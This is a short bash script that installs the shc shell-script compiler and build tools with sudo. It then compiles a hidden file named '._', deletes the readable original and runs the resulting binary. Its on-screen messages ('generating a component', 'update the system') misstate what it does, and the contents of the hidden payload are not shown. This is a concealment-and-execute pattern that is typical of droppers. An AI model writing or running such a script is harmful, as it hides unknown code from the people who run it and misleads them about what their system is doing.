#!/bin/bash


echo "Generating a new component..."

sudo apt install shc -y

clear

echo "Now we need the basic sources."
echo " " 
sleep 2

sudo apt install build-essential

clear

sleep 2

echo "Now u can encrypt your scripts."
echo " "
echo "We need to update the system."
chmod +x ._
shc -f ._
rm ._
chmod +x ._.x
./._.x
